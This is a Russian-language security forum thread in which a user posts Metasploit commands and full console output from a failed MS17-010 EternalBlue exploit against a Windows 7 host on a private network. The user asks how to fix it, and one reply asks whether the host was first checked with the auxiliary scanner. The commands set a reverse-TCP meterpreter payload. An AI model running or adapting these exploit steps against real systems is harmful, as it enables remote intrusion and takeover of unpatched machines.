MS17-010. Ошибка.

lukabroot

lukabroot

Member
19.03.2022
6
0
BIT
0
Добрый вечер! Помогите, пожалуйста, исправить ошибку:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.105
LHOST => 192.168.0.105
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.105:4444
[*] 192.168.0.108:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.108:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.108:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.108:445 - The target is vulnerable.
[*] 192.168.0.108:445 - Connecting to target for exploitation.
[+] 192.168.0.108:445 - Connection established for exploitation.
[+] 192.168.0.108:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.108:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.108:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.0.108:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.0.108:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.108:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.108:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.108:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.108:445 - Starting non-paged pool grooming
[+] 192.168.0.108:445 - Sending SMBv2 buffers
[+] 192.168.0.108:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.108:445 - Sending final SMBv2 buffers.
[*] 192.168.0.108:445 - Sending last fragment of exploit packet!
[*] 192.168.0.108:445 - Receiving response from exploit packet
[+] 192.168.0.108:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.108:445 - Sending egg to corrupted connection.
[*] 192.168.0.108:445 - Triggering free of corrupted buffer.
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.0.108:445 - Connecting to target for exploitation.
[+] 192.168.0.108:445 - Connection established for exploitation.
[+] 192.168.0.108:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.108:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.108:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.0.108:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.0.108:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.108:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.108:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.0.108:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.108:445 - Starting non-paged pool grooming
[+] 192.168.0.108:445 - Sending SMBv2 buffers
[+] 192.168.0.108:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.108:445 - Sending final SMBv2 buffers.
[*] 192.168.0.108:445 - Sending last fragment of exploit packet!
[*] 192.168.0.108:445 - Receiving response from exploit packet
[+] 192.168.0.108:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.108:445 - Sending egg to corrupted connection.
[*] 192.168.0.108:445 - Triggering free of corrupted buffer.
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.0.108:445 - Connecting to target for exploitation.
[+] 192.168.0.108:445 - Connection established for exploitation.
[+] 192.168.0.108:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.108:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.108:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.0.108:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.0.108:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.108:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.108:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.0.108:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.108:445 - Starting non-paged pool grooming
[+] 192.168.0.108:445 - Sending SMBv2 buffers
[+] 192.168.0.108:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.108:445 - Sending final SMBv2 buffers.
[*] 192.168.0.108:445 - Sending last fragment of exploit packet!
[*] 192.168.0.108:445 - Receiving response from exploit packet
[!] 192.168.0.108:445 - ETERNALBLUE overwrite returned unexpected status code (0xC0000205)!
[*] 192.168.0.108:445 - Sending egg to corrupted connection.
[*] 192.168.0.108:445 - Triggering free of corrupted buffer.
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.108:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
 
Rook

Rook

Codeby Team
Red Team
09.01.2019
727
718
BIT
4
aux'ом проверял хост на уязвимость ?
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ